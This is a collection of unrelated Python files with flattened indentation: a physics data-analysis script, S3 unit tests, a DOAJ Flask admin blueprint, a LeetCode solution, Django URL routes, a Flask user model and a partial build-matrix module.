# Define an analyzer
analyzers_list = [
analyzers.FluorescenceImageAnalyzer(
background_subtractor, signal_size_calculator
)
]
# Define a parameter scan analyzer
if switch_name:
scan_analyzer = analyzers.SwitchingParamScanAnalyzer(
scan_param_new_name,
switch_name,
analyzers_list,
# plotter = SwitchingParamScanPlotter()
)
else:
scan_analyzer = analyzers.ParamScanAnalyzer(
scan_param_new_name,
analyzers_list,
# plotter = ParamScanPlotter()
)
# Run parameter scan analysis using bootstrap
if switch_name:
bs_plotter = plotters.SwitchingParamScanPlotterBS(switch_name)
else:
bs_plotter = plotters.ParamScanPlotterBS()
bootstrapper = bootstrapping.Bootstrapper(scan_analyzer, plotter=bs_plotter)
bootstrapper.bootstrap(df, n_bs=n_bs, n_jobs=5)
df_bootstrap = bootstrapper.df_bootstrap
bootstrapper.aggregate(scan_param=scan_param_new_name)
df_agg = bootstrapper.df_agg
# Save the analyzed data
# Bootstrapped data for distributions
bs_save_path = (
f"G:\My Drive\CeNTREX Oskari\State preparation\SPA\Data analysis"
f"\Analyzed Data\{filepath.parts[-1][:-4]}_bootstrap.hdf"
)
df_bootstrap.to_hdf(
bs_save_path, run_name, "a",
)
print("Saved bootstrapped results to:")
print(bs_save_path)
# Aggregated data for final results
agg_save_path = (
f"G:\My Drive\CeNTREX Oskari\State preparation\SPA\Data analysis"
f"\Analyzed Data\{filepath.parts[-1][:-4]}_analyzed.hdf"
)
df_agg.to_hdf(
agg_save_path, run_name, "a",
)
print("\nSaved aggregated results to:")
print(agg_save_path)
print("\nRun name:")
print(run_name)
if __name__ == "__main__":
# Define path to data
DATA_DIR = Path(
"D:\Google Drive\CeNTREX Oskari\State preparation\SPA\Data analysis\Data"
)
DATA_FNAME = Path("SPA_test_11_9_2021.hdf")
filepath = DATA_DIR / DATA_FNAME
# Define scan parameter name
scan_param_name = "SynthHD Pro SPA SetFrequencyCHAGUI"
scan_param_new_name = "SPAJ01Frequency"
# Run the script
analyze_SPA_dataset(
filepath, 6, 0, scan_param_name, scan_param_new_name, switch_name="MicrowavesON"
)
|
"""something_something_DVD_subgoal dataset."""
from .something_something_DVD_subgoal import SomethingSomethingDvdSubgoal
|
class Channel(object):
def __init__(self, name, topic):
self.name = name
self.topic = topic
# the puzzle that is giving this channel its name, either
# via a correct or incorrect solution
self.puzzle = None
# previous channel (if there is one)
self.prev = None
# next channel (the one you'll get to if you solve the clue
# in this channels topic)
self.next = None
# other channel with incorrect solutions
self.next_incorrect = []
self.puzzle = None
def __str__(self):
name_puzzle = self.puzzle.name if self.puzzle else '-'
topic_puzzle = self.get_topic_puzzle().name if self.get_topic_puzzle() else '-'
return '<Channel %s [topic:%s] [name_puzzle:%s topic_puzzle:%s]>' % (self.name, self.topic, name_puzzle, topic_puzzle)
def get_topic_puzzle(self):
"""The puzzle that is giving this channel its topic."""
return self.next.puzzle if self.next else None
|
import unittest
import json
import pickle
from moto import mock_s3
import boto3
import pandas as pd
from tagr.tagging.artifacts import Tagr
from tagr.storage.aws import Aws
DATA = [{"a": 1, "b": 2, "c": 3}, {"a": 10, "b": 20, "c": 30}]
DF = pd.DataFrame(DATA)
EXPERIMENT_PARAMS = {
"proj": "unit-test-project",
"experiment": "unit_test_expr",
"tag": "unit_test_tag",
}
@mock_s3
class FlushTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
self.tag = Tagr()
self.tag.storage_provider = Aws()
super().__init__(*args, **kwargs)
@staticmethod
def create_connection():
conn = boto3.resource("s3", region_name="us-east-1")
conn.create_bucket(Bucket=EXPERIMENT_PARAMS["proj"])
return conn
def test_flush(self):
# Arrange
expected_result = {"test_key": "test_val"}
conn = self.create_connection()
# Act
self.tag.save({"test_key": "test_val"}, "dict1", "other")
self.tag.flush(
proj=EXPERIMENT_PARAMS["proj"],
experiment=EXPERIMENT_PARAMS["experiment"],
tag=EXPERIMENT_PARAMS["tag"],
storage="aws",
)
dict_file = (
conn.Object(
EXPERIMENT_PARAMS["proj"],
"{}/{}/dict1.pkl".format(
EXPERIMENT_PARAMS["experiment"], EXPERIMENT_PARAMS["tag"]
),
)
.get()["Body"]
.read()
)
dict_content = pickle.loads(dict_file)
# Assert
self.assertEqual(expected_result, dict_content)
def test_get_primitive_objs_dict(self):
expected_result = {"str1": "a", "int1": 1, "float1": 2.0}
self.tag.save("a", "str1", "primitive")
self.tag.save(1, "int1", "primitive")
self.tag.save(2.0, "float1", "primitive")
self.tag.save(DF, "df1", "dataframe")
summary = self.tag.summary()
primitive_objs_dict = self.tag._get_primitive_objs_dict(summary)
self.assertEqual(expected_result, primitive_objs_dict)
def test_flush_metadata_json(self):
expected_result = {
"types": {"df1": dict(zip(DF.columns, DF.dtypes.map(lambda x: x.name)))},
"stats": {"df1": DF.describe().to_dict()},
"primitive_objs": {"float1": 2.0, "int1": 1, "str1": "a"},
}
conn = self.create_connection()
self.tag.save("a", "str1", "primitive")
self.tag.save(1, "int1", "primitive")
self.tag.save(2.0, "float1", "primitive")
self.tag.save(DF, "df1", "dataframe")
summary = self.tag.summary()
# flush dfs to gen metadata
self.tag._flush_dfs(summary, EXPERIMENT_PARAMS)
self.tag._flush_metadata_json(summary, EXPERIMENT_PARAMS)
res = (
conn.Object(
EXPERIMENT_PARAMS["proj"],
"{}/{}/df_summary.json".format(
EXPERIMENT_PARAMS["experiment"], EXPERIMENT_PARAMS["tag"]
),
)
.get()["Body"]
.read()
.decode("utf-8")
)
json_content = json.loads(res)
self.assertEqual(expected_result, json_content)
def test_flush_dfs(self):
expected_result = DF
conn = self.create_connection()
self.tag.save(DF, "df1", "dataframe")
summary = self.tag.summary()
self.tag._flush_dfs(summary, EXPERIMENT_PARAMS)
res = conn.Object(
EXPERIMENT_PARAMS["proj"],
"{}/{}/df1.csv".format(
EXPERIMENT_PARAMS["experiment"], EXPERIMENT_PARAMS["tag"]
),
).get()["Body"]
df_content = pd.read_csv(res, index_col=0)
pd._testing.assert_frame_equal(expected_result, df_content)
def test_flush_non_dfs(self):
# Arrange
expected_result_str = "a"
expected_result_int = 1
expected_result_dict = {"test_key": "test_val"}
conn = self.create_connection()
# Act
self.tag.save("a", "str1", "primitive")
self.tag.save(1, "int1", "primitive")
self.tag.save({"test_key": "test_val"}, "dict1", "other")
summary = self.tag.summary()
self.tag._flush_non_dfs(summary, EXPERIMENT_PARAMS)
str_file = (
conn.Object(
EXPERIMENT_PARAMS["proj"],
"{}/{}/str1.pkl".format(
EXPERIMENT_PARAMS["experiment"], EXPERIMENT_PARAMS["tag"]
),
)
.get()["Body"]
.read()
)
str_content = pickle.loads(str_file)
int_file = (
conn.Object(
EXPERIMENT_PARAMS["proj"],
"{}/{}/int1.pkl".format(
EXPERIMENT_PARAMS["experiment"], EXPERIMENT_PARAMS["tag"]
),
)
.get()["Body"]
.read()
)
int_content = pickle.loads(int_file)
dict_file = (
conn.Object(
EXPERIMENT_PARAMS["proj"],
"{}/{}/dict1.pkl".format(
EXPERIMENT_PARAMS["experiment"], EXPERIMENT_PARAMS["tag"]
),
)
.get()["Body"]
.read()
)
dict_content = pickle.loads(dict_file)
# Assert
self.assertEqual(expected_result_str, str_content)
self.assertEqual(expected_result_int, int_content)
self.assertEqual(expected_result_dict, dict_content)
|
import json
from flask import Blueprint, request, flash, abort, make_response
from flask import render_template, redirect, url_for
from flask_login import current_user, login_required
from werkzeug.datastructures import MultiDict
from portality.bll.exceptions import ArticleMergeConflict, DuplicateArticleException
from portality.decorators import ssl_required, restrict_to_role, write_required
import portality.models as models
from portality.formcontext import choices
from portality import lock, app_email
from portality.lib.es_query_http import remove_search_limits
from portality.util import flash_with_url, jsonp, make_json_resp, get_web_json_payload, validate_json
from portality.core import app
from portality.tasks import journal_in_out_doaj, journal_bulk_edit, suggestion_bulk_edit, journal_bulk_delete, article_bulk_delete
from portality.bll import DOAJ, exceptions
from portality.lcc import lcc_jstree
# from portality.formcontext import emails
import portality.notifications.application_emails as emails
from portality.ui.messages import Messages
from portality.formcontext import formcontext
from portality.view.forms import EditorGroupForm, MakeContinuation
from portality.forms.application_forms import ApplicationFormFactory
from portality.background import BackgroundSummary
from portality import constants
from portality.forms.application_forms import JournalFormFactory
from portality.crosswalks.application_form import ApplicationFormXWalk
blueprint = Blueprint('admin', __name__)
# restrict everything in admin to logged in users with the "admin" role
@blueprint.before_request
def restrict():
return restrict_to_role('admin')
# build an admin page where things can be done
@blueprint.route('/')
@login_required
@ssl_required
def index():
return render_template('admin/index.html', admin_page=True)
@blueprint.route("/journals", methods=["GET"])
@login_required
@ssl_required
def journals():
qs = request.query_string
target = url_for("admin.index")
if qs:
target += "?" + qs.decode()
return redirect(target)
@blueprint.route("/journals", methods=["POST", "DELETE"])
@login_required
@ssl_required
@write_required()
@jsonp
def journals_list():
if request.method == "POST":
try:
query = json.loads(request.values.get("q"))
except:
app.logger.warn("Bad Request at admin/journals: " + str(request.values.get("q")))
abort(400)
# get the total number of journals to be affected
jtotal = models.Journal.hit_count(query, consistent_order=False)
# get the total number of articles to be affected
issns = models.Journal.issns_by_query(query)
atotal = models.Article.count_by_issns(issns)
resp = make_response(json.dumps({"journals" : jtotal, "articles" : atotal}))
resp.mimetype = "application/json"
return resp
elif request.method == "DELETE":
if not current_user.has_role("delete_article"):
abort(401)
try:
query = json.loads(request.data)
except:
app.logger.warn("Bad Request at admin/journals: " + str(request.data))
abort(400)
# get only the query part
query = {"query" : query.get("query")}
models.Journal.delete_selected(query=query, articles=True, snapshot_journals=True, snapshot_articles=True)
resp = make_response(json.dumps({"status" : "success"}))
resp.mimetype = "application/json"
return resp
@blueprint.route("/articles", methods=["POST", "DELETE"])
@login_required
@ssl_required
@write_required()
@jsonp
def articles_list():
if request.method == "POST":
try:
query = json.loads(request.values.get("q"))
except:
print(request.values.get("q"))
abort(400)
total = models.Article.hit_count(query, consistent_order=False)
resp = make_response(json.dumps({"total" : total}))
resp.mimetype = "application/json"
return resp
elif request.method == "DELETE":
if not current_user.has_role("delete_article"):
abort(401)
try:
query = json.loads(request.data)
except:
app.logger.warn("Bad Request at admin/journals: " + str(request.data))
abort(400)
# get only the query part
query = {"query" : query.get("query")}
models.Article.delete_selected(query=query, snapshot=True)
resp = make_response(json.dumps({"status" : "success"}))
resp.mimetype = "application/json"
return resp
@blueprint.route("/delete/article/<article_id>", methods=["POST"])
@login_required
@ssl_required
@write_required()
def article_endpoint(article_id):
if not current_user.has_role("delete_article"):
abort(401)
a = models.Article.pull(article_id)
if a is None:
abort(404)
delete = request.values.get("delete", "false")
if delete != "true":
abort(400)
a.snapshot()
a.delete()
# return a json response
resp = make_response(json.dumps({"success" : True}))
resp.mimetype = "application/json"
return resp
@blueprint.route("/article/<article_id>", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def article_page(article_id):
if not current_user.has_role("edit_article"):
abort(401)
ap = models.Article.pull(article_id)
if ap is None:
abort(404)
fc = formcontext.ArticleFormFactory.get_from_context(role="admin", source=ap, user=current_user)
if request.method == "GET":
return fc.render_template()
elif request.method == "POST":
user = current_user._get_current_object()
fc = formcontext.ArticleFormFactory.get_from_context(role="admin", source=ap, user=user, form_data=request.form)
fc.modify_authors_if_required(request.values)
if fc.validate():
try:
fc.finalise()
except ArticleMergeConflict:
Messages.flash(Messages.ARTICLE_METADATA_MERGE_CONFLICT)
except DuplicateArticleException:
Messages.flash(Messages.ARTICLE_METADATA_UPDATE_CONFLICT)
return fc.render_template()
@blueprint.route("/journal/<journal_id>", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def journal_page(journal_id):
auth_svc = DOAJ.authorisationService()
journal_svc = DOAJ.journalService()
journal, _ = journal_svc.journal(journal_id)
if journal is None:
abort(404)
try:
auth_svc.can_edit_journal(current_user._get_current_object(), journal)
except exceptions.AuthoriseException:
abort(401)
# attempt to get a lock on the object
try:
lockinfo = lock.lock(constants.LOCK_JOURNAL, journal_id, current_user.id)
except lock.Locked as l:
return render_template("admin/journal_locked.html", journal=journal, lock=l.lock)
fc = JournalFormFactory.context("admin")
if request.method == "GET":
job = None
job_id = request.values.get("job")
if job_id is not None and job_id != "":
job = models.BackgroundJob.pull(job_id)
flash("Job to withdraw/reinstate journal has been submitted")
fc.processor(source=journal)
return fc.render_template(lock=lockinfo, job=job, obj=journal, lcc_tree=lcc_jstree)
elif request.method == "POST":
processor = fc.processor(formdata=request.form, source=journal)
if processor.validate():
try:
processor.finalise()
flash('Journal updated.', 'success')
for a in processor.alert:
flash_with_url(a, "success")
return redirect(url_for("admin.journal_page", journal_id=journal.id, _anchor='done'))
except Exception as e:
flash(str(e))
return redirect(url_for("admin.journal_page", journal_id=journal.id, _anchor='cannot_edit'))
else:
return fc.render_template(lock=lockinfo, obj=journal, lcc_tree=lcc_jstree)
######################################################
# Endpoints for reinstating/withdrawing journals from the DOAJ
#
@blueprint.route("/journal/<journal_id>/activate", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def journal_activate(journal_id):
job = journal_in_out_doaj.change_in_doaj([journal_id], True)
return redirect(url_for('.journal_page', journal_id=journal_id, job=job.id))
@blueprint.route("/journal/<journal_id>/deactivate", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def journal_deactivate(journal_id):
job = journal_in_out_doaj.change_in_doaj([journal_id], False)
return redirect(url_for('.journal_page', journal_id=journal_id, job=job.id))
@blueprint.route("/journals/bulk/withdraw", methods=["POST"])
@login_required
@ssl_required
@write_required()
def journals_bulk_withdraw():
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = journal_in_out_doaj.change_by_query(q, False, dry_run=payload.get("dry_run", True))
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/journals/bulk/reinstate", methods=["POST"])
@login_required
@ssl_required
@write_required()
def journals_bulk_reinstate():
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = journal_in_out_doaj.change_by_query(q, True, dry_run=payload.get("dry_run", True))
return make_json_resp(summary.as_dict(), status_code=200)
#
#####################################################################
@blueprint.route("/journal/<journal_id>/continue", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def journal_continue(journal_id):
j = models.Journal.pull(journal_id)
if j is None:
abort(404)
if request.method == "GET":
type = request.values.get("type")
form = MakeContinuation()
form.type.data = type
return render_template("admin/continuation.html", form=form, current=j)
elif request.method == "POST":
form = MakeContinuation(request.form)
if not form.validate():
return render_template('admin/continuation.html', form=form, current=j)
if form.type.data is None:
abort(400)
if form.type.data not in ["replaces", "is_replaced_by"]:
abort(400)
try:
cont = j.make_continuation(form.type.data, eissn=form.eissn.data, pissn=form.pissn.data, title=form.title.data)
except:
abort(400)
flash("The continuation has been created (see below). You may now edit the other metadata associated with it. The original journal has also been updated with this continuation's ISSN(s). Once you are happy with this record, you can publish it to the DOAJ", "success")
return redirect(url_for('.journal_page', journal_id=cont.id))
@blueprint.route("/applications", methods=["GET"])
@login_required
@ssl_required
def suggestions():
return render_template("admin/applications.html",
admin_page=True,
application_status_choices=choices.Choices.application_status("admin"))
@blueprint.route("/application/<application_id>", methods=["GET", "POST"])
@write_required()
@login_required
@ssl_required
def application(application_id):
auth_svc = DOAJ.authorisationService()
application_svc = DOAJ.applicationService()
ap, _ = application_svc.application(application_id)
if ap is None:
abort(404)
try:
auth_svc.can_edit_application(current_user._get_current_object(), ap)
except exceptions.AuthoriseException:
abort(401)
try:
lockinfo = lock.lock(constants.LOCK_APPLICATION, application_id, current_user.id)
except lock.Locked as l:
return render_template("admin/application_locked.html", application=ap, lock=l.lock)
fc = ApplicationFormFactory.context("admin")
form_diff, current_journal = ApplicationFormXWalk.update_request_diff(ap)
if request.method == "GET":
fc.processor(source=ap)
return fc.render_template(obj=ap, lock=lockinfo, form_diff=form_diff, current_journal=current_journal, lcc_tree=lcc_jstree)
elif request.method == "POST":
processor = fc.processor(formdata=request.form, source=ap)
if processor.validate():
try:
processor.finalise(current_user._get_current_object())
flash('Application updated.', 'success')
for a in processor.alert:
flash_with_url(a, "success")
return redirect(url_for("admin.application", application_id=ap.id, _anchor='done'))
except Exception as e:
flash(str(e))
return redirect(url_for("admin.application", application_id=ap.id, _anchor='cannot_edit'))
else:
return fc.render_template(obj=ap, lock=lockinfo, form_diff=form_diff, current_journal=current_journal, lcc_tree=lcc_jstree)
@blueprint.route("/application_quick_reject/<application_id>", methods=["POST"])
@login_required
@ssl_required
@write_required()
def application_quick_reject(application_id):
# extract the note information from the request
canned_reason = request.values.get("quick_reject", "")
additional_info = request.values.get("quick_reject_details", "")
reasons = []
if canned_reason != "":
reasons.append(canned_reason)
if additional_info != "":
reasons.append(additional_info)
if len(reasons) == 0:
abort(400)
reason = " - ".join(reasons)
note = Messages.REJECT_NOTE_WRAPPER.format(editor=current_user.id, note=reason)
applicationService = DOAJ.applicationService()
# retrieve the application and an edit lock on that application
application = None
try:
application, alock = applicationService.application(application_id, lock_application=True, lock_account=current_user._get_current_object())
except lock.Locked as e:
abort(409)
# determine if this was a new application or an update request
update_request = application.current_journal is not None
if update_request:
abort(400)
if application.owner is None:
Messages.flash_with_url(Messages.ADMIN__QUICK_REJECT__NO_OWNER, "error")
# redirect the user back to the edit page
return redirect(url_for('.application', application_id=application_id))
# reject the application
applicationService.reject_application(application, current_user._get_current_object(), note=note)
# send the notification email to the user
sent = False
send_report = []
try:
send_report = emails.send_publisher_reject_email(application, note=reason, update_request=update_request)
sent = True
except app_email.EmailException as e:
pass
# sort out some flash messages for the user
flash(note, "success")
for instructions in send_report:
msg = ""
flash_type = "success"
if sent:
if instructions["type"] == "owner":
msg = Messages.SENT_REJECTED_APPLICATION_EMAIL_TO_OWNER.format(user=application.owner, email=instructions["email"], name=instructions["name"])
elif instructions["type"] == "suggester":
msg = Messages.SENT_REJECTED_APPLICATION_EMAIL_TO_SUGGESTER.format(email=instructions["email"], name=instructions["name"])
else:
msg = Messages.NOT_SENT_REJECTED_APPLICATION_EMAILS.format(user=application.owner)
flash_type = "error"
flash(msg, flash_type)
# redirect the user back to the edit page
return redirect(url_for('.application', application_id=application_id))
@blueprint.route("/admin_site_search", methods=["GET"])
@login_required
@ssl_required
def admin_site_search():
#edit_formcontext = formcontext.ManEdBulkEdit()
#edit_form = edit_formcontext.render_template()
edit_formulaic_context = JournalFormFactory.context("bulk_edit")
edit_form = edit_formulaic_context.render_template()
return render_template("admin/admin_site_search.html",
admin_page=True,
edit_form=edit_form)
@blueprint.route("/editor_groups")
@login_required
@ssl_required
def editor_group_search():
return render_template("admin/editor_group_search.html", admin_page=True)
@blueprint.route("/background_jobs")
@login_required
@ssl_required
def background_jobs_search():
return render_template("admin/background_jobs_search.html", admin_page=True)
@blueprint.route("/editor_group", methods=["GET", "POST"])
@blueprint.route("/editor_group/<group_id>", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def editor_group(group_id=None):
if not current_user.has_role("modify_editor_groups"):
abort(401)
if request.method == "GET":
form = EditorGroupForm()
if group_id is not None:
eg = models.EditorGroup.pull(group_id)
form.group_id.data = eg.id
form.name.data = eg.name
form.editor.data = eg.editor
form.associates.data = ",".join(eg.associates)
return render_template("admin/editor_group.html", admin_page=True, form=form)
elif request.method == "POST":
if request.values.get("delete", "false") == "true":
# we have been asked to delete the id
if group_id is None:
# we can only delete things that exist
abort(400)
eg = models.EditorGroup.pull(group_id)
if eg is None:
abort(404)
eg.delete()
# return a json response
resp = make_response(json.dumps({"success" : True}))
resp.mimetype = "application/json"
return resp
# otherwise, we want to edit the content of the form or the object
form = EditorGroupForm(request.form)
if form.validate():
# get the group id from the url or from the request parameters
if group_id is None:
group_id = request.values.get("group_id")
group_id = group_id if group_id != "" else None
# if we have a group id, this is an edit, so get the existing group
if group_id is not None:
eg = models.EditorGroup.pull(group_id)
if eg is None:
abort(404)
else:
eg = models.EditorGroup()
associates = form.associates.data
if associates is not None:
associates = [a.strip() for a in associates.split(",") if a.strip() != ""]
# prep the user accounts with the correct role(s)
ed = models.Account.pull(form.editor.data)
ed.add_role("editor")
ed.save()
if associates is not None:
for a in associates:
ae = models.Account.pull(a)
if ae is not None: # If the account has been deleted, pull fails
ae.add_role("associate_editor")
ae.save()
eg.set_name(form.name.data)
eg.set_editor(form.editor.data)
if associates is not None:
eg.set_associates(associates)
eg.save()
flash("Group was updated - changes may not be reflected below immediately. Reload the page to see the update.", "success")
return redirect(url_for('admin.editor_group_search'))
else:
return render_template("admin/editor_group.html", admin_page=True, form=form)
@blueprint.route("/autocomplete/user")
@login_required
@ssl_required
def user_autocomplete():
q = request.values.get("q")
s = request.values.get("s", 10)
ac = models.Account.autocomplete("id", q, size=s)
# return a json response
resp = make_response(json.dumps(ac))
resp.mimetype = "application/json"
return resp
# Route which returns the associate editor account names within a given editor group
@blueprint.route("/dropdown/eg_associates")
@login_required
@ssl_required
def eg_associates_dropdown():
egn = request.values.get("egn")
eg = models.EditorGroup.pull_by_key("name", egn)
if eg is not None:
editors = [eg.editor]
editors += eg.associates
editors = list(set(editors))
else:
editors = None
# return a json response
resp = make_response(json.dumps(editors))
resp.mimetype = "application/json"
return resp
####################################################
## endpoints for bulk edit
class BulkAdminEndpointException(Exception):
pass
@app.errorhandler(BulkAdminEndpointException)
def bulk_admin_endpoints_bad_request(exception):
r = {}
r['error'] = exception.message
return make_json_resp(r, status_code=400)
def get_bulk_edit_background_task_manager(doaj_type):
if doaj_type == 'journals':
return journal_bulk_edit.journal_manage
elif doaj_type == 'applications':
return suggestion_bulk_edit.suggestion_manage
else:
raise BulkAdminEndpointException('Unsupported DOAJ type - you can currently only bulk edit journals and applications.')
def get_query_from_request(payload):
q = payload['selection_query']
q = remove_search_limits(q)
return q
@blueprint.route("/<doaj_type>/bulk/assign_editor_group", methods=["POST"])
@login_required
@ssl_required
@write_required()
def bulk_assign_editor_group(doaj_type):
task = get_bulk_edit_background_task_manager(doaj_type)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query', 'editor_group'], error_to_raise=BulkAdminEndpointException)
summary = task(
selection_query=get_query_from_request(payload),
editor_group=payload['editor_group'],
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/<doaj_type>/bulk/add_note", methods=["POST"])
@login_required
@ssl_required
@write_required()
def bulk_add_note(doaj_type):
task = get_bulk_edit_background_task_manager(doaj_type)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query', 'note'], error_to_raise=BulkAdminEndpointException)
summary = task(
selection_query=get_query_from_request(payload),
note=payload['note'],
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/journals/bulk/edit_metadata", methods=["POST"])
@login_required
@ssl_required
@write_required()
def bulk_edit_journal_metadata():
task = get_bulk_edit_background_task_manager("journals")
payload = get_web_json_payload()
if not "metadata" in payload:
raise BulkAdminEndpointException("key 'metadata' not present in request json")
formdata = MultiDict(payload["metadata"])
formulaic_context = JournalFormFactory.context("bulk_edit")
fc = formulaic_context.processor(formdata=formdata)
if not fc.validate():
msg = "Unable to submit your request due to form validation issues: "
for field in fc.form:
if field.errors:
msg += field.label.text + " - " + ",".join(field.errors)
summary = BackgroundSummary(None, error=msg)
else:
summary = task(
selection_query=get_query_from_request(payload),
dry_run=payload.get('dry_run', True),
**payload["metadata"]
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/applications/bulk/change_status", methods=["POST"])
@login_required
@ssl_required
@write_required()
def applications_bulk_change_status():
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query', 'application_status'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = get_bulk_edit_background_task_manager('applications')(
selection_query=q,
application_status=payload['application_status'],
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/journals/bulk/delete", methods=['POST'])
@write_required()
def bulk_journals_delete():
if not current_user.has_role("ultra_bulk_delete"):
abort(403)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = journal_bulk_delete.journal_bulk_delete_manage(
selection_query=q,
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/articles/bulk/delete", methods=['POST'])
@write_required()
def bulk_articles_delete():
if not current_user.has_role("ultra_bulk_delete"):
abort(403)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = article_bulk_delete.article_bulk_delete_manage(
selection_query=q,
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
################################################# |
'''
https://leetcode.com/contest/weekly-contest-170/problems/get-watched-videos-by-your-friends/
'''
class Solution:
def watchedVideosByFriends(self, watchedVideos: List[List[str]], friends: List[List[int]], id: int, level: int) -> List[str]:
vis = set(friends[id])
q = [*friends[id]]
ps = len(q)
while level > 1:
s = len(q) - ps
ps = 0
for i in range(s, len(q)):
for f in friends[q[i]]:
if f not in vis:
vis.add(f)
q.append(f)
ps += 1
level -= 1
vids = {}
for i in range(len(q) - ps, len(q)):
if q[i] == id: continue
for v in watchedVideos[q[i]]:
if v not in vids: vids[v] = 0
vids[v] += 1
p = [(v, k) for k, v in vids.items()]
p.sort()
return [a[1] for a in p]
|
from django.conf.urls import url
from . import views
app_name = "users"
urlpatterns = [
# path("", view=views.UserListView.as_view(), name="list"),
# path("~redirect/", view=views.UserRedirectView.as_view(), name="redirect"),
# path("~update/", view=views.UserUpdateView.as_view(), name="update"),
# path(
# "<str:username>",
# view=views.UserDetailView.as_view(),
# name="detail",
# ),
url(
regex=r'^explore$',
view=views.ExploreUsers.as_view(),
name='explore_users'
),
url(
regex=r'(?P<user_id>[0-9]+)/follow/$',
view=views.FollowUser.as_view(),
name='follow_user'
),
url(
regex=r'(?P<user_id>[0-9]+)/unfollow/$',
view=views.UnFollowUser.as_view(),
name='follow_user'
),
url(
regex=r'^(?P<username>\w+)/followers/$',
view=views.UserFollowers.as_view(),
name='user_followers'
),
url(
regex=r'^(?P<username>\w+)/following/$',
view=views.UserFollowing.as_view(),
name='user_following'
),
url(
regex=r'^search/$',
view=views.Search.as_view(),
name='user_search'
),
url(
regex=r'^(?P<username>\w+)/$',
view=views.UserProfile.as_view(),
name='user_profile'
),
url(
regex=r'^(?P<username>\w+)/password/$',
view=views.ChangePassword.as_view(),
name='change'
),
url(r'^login/facebook/$', views.FacebookLogin.as_view(), name='fb_login'),
# url(
# regex=r'^(?P<username>\w+)/following/$',
# view=views.UserFollowingFBV,
# name='user_following'
# ),
]
|
import sys
if len(sys.argv) != 4:
print('Uso ex09-13.py nome_do_aquivo inicio fim')
else:
try:
nome = sys.argv[1]
arquivo = open(nome, 'r')
inicio = int(sys.argv[2])
fim = int(sys.argv[3])
except:
print(f'{nome} -> arquivo nao encontrado.')
else:
c = 1
for linha in arquivo.readlines()[inicio-1: fim]:
print(linha[:-1]) |
import ctypes
so6 = ctypes.CDLL("./so6.so")
l = so6.hello("World!".encode("utf-8"))
print(l)
|
"""------------------------------------------------------------*-
Model module for Flask server
Tested on: Raspberry Pi 3 B+
(c) Minh-An Dao 2019-2020
(c) Miguel Grinberg 2018
version 1.10 - 21/03/2020
--------------------------------------------------------------
* Defines database columns and tables
*
--------------------------------------------------------------"""
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
from hashlib import md5
from app import db, login
from datetime import datetime, timezone
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
password_hash = db.Column(db.String(128))
def set_password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
def __repr__(self):
return '<User {} - {}>'.format(self.id, self.username)
@login.user_loader
def load_user(id):
return User.query.get(int(id))
|
import configparser as ConfigParser
import os
from os.path import exists, join
import platform
from .docker import RunAsContainer
from .exceptions import MatrixValidationError
from .utilities import Execute
DEFAULT_MATRIX_FILE = 'matrix.ini'
class MatrixEntry(object):
def __init__(self, target, arch, toolchain, variant):
self.target = target
self.arch = arch
self.toolchain = toolchain
self.variant = variant
self.container = None
self.priority = 1
def __repr__(self):
return self.name
@property
def name(self):
return '{}-{}-{}-{}'.format(self.target, self.arch, self.toolchain, self.variant)
def SetupBuildMatrixCommand(commands):
command = commands.add_parser('build-matrix',
help='Build the project matrix as psecified by a matrix configuration.')
command.add_argument('--all', action='store_true', default=False, required=False,
help='Run all entries in the build matrix for the current platform.')
command.add_argument('--concurrency', '-c', type=int, default=1,
required=False,
help='Specify the concurrency for building. Only used when executing '\
'make on a POSIX system.')
command.add_argument('--config', '-C', default=join(os.getcwd(), DEFAULT_MATRIX_FILE),
required=False,
help='Path to the matrix configuration. If one is not specified then '
'the default location is to look in the project root for it.')
command.add_argument('--fresh', action='store_true', default=False,
help='Regenerate the CMake project for the build.')
command.add_argument('--priority', '-p', type=int, default=1, required=False,
help='Specify a build matrix priority to filter on. By default only priority '
'1 items will be built.')
command.add_argument('--verbose', '-v', action='store_true', default=False,
help='Trigger verbose logging during the build process.')
return command
def ParseMatrixConfig(configFile):
config = configparser.ConfigParser()
with open(configFile, 'rb') as handle:
config.readfp(handle)
target = str(platform.system()).lower()
if not config.has_section(target):
print('No matrix configuration for platform: {}'.format(target))
return False
arch = ValidateTarget(config, target, 'arch')
toolchain = ValidateTarget(config, target, 'toolchain')
variant = ValidateTarget(config, target, 'variant')
matrix = []
for a in arch:
for t in toolchain:
for v in variant:
entry = MatrixEntry(target, a, t, v)
